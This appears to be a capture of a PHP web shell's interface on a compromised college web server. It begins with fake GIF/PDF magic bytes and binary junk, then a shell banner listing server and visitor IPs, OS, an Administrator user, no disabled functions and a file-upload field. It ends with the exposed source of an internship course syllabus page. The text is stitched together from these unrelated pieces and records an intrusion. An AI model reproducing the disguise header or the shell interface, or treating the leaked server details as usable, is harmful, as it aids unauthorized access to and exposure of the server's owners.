GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST2881/ |
Upload File : |
<? // JimMartinson/CST1802/Syllabus.php $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. include('application.phpinc'); include('Course/courseInfo.phpinc'); include('classInfo.phpinc'); $title = "Syllabus"; $headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title; $pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title; $pageMenu = 'Course/courseMenu.phpinc'; $js='openCenteredWindow'; include('common/pageHeader.phpinc'); $sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title; include('common/sectionHeader.phpinc'); ?> <p> <fieldset><legend>Description</legend> This course is designed for a student entering the computer systems or network administration field who desires work experience in the field. <br> This course is a cooperative work study program between Ridgewater Computer Systems Technology Department and a company dealing with the field of computers which allows the student an employment-like work experience. </fieldset> <fieldset><legend>Objectives</legend> Objectives are determined through consultation with the Student, Student Supervisor, and Internship Instructor. </fieldset> <? include('ReferencesResources.phpinc'); ?> <fieldset><legend>Requirements</legend> An average student will spend <?=$class['labHours']?> hours performing work on the job for each credit of <?=$courseNumber?> <?=$courseTitle?>. The student is expected to contact the instructor if difficulty is encountered or help is needed. Attendance is critical for completion of the credits. </fieldset> <fieldset><legend>Grading</legend> Student work is translated to hours, the hours to a percentage and the percentages to grades. The percentage is based on <?=$class['labHours']?> hours per credit with a minimun satisfactory evaluation by the Student Supervisor. A score of 70% is passing. The following percentage distribution guarantees the following grade: A:93%+, A-:90%+, B+:87%+, B:83%+, B-:80%+, C+:77%+, C:73%+, C-:70%+, F:<70%. </fieldset> </p> <? include('Course/DisabilityNotice.phpinc'); include('common/sectionFooter.phpinc'); include('common/pageFooter.phpinc'); ?>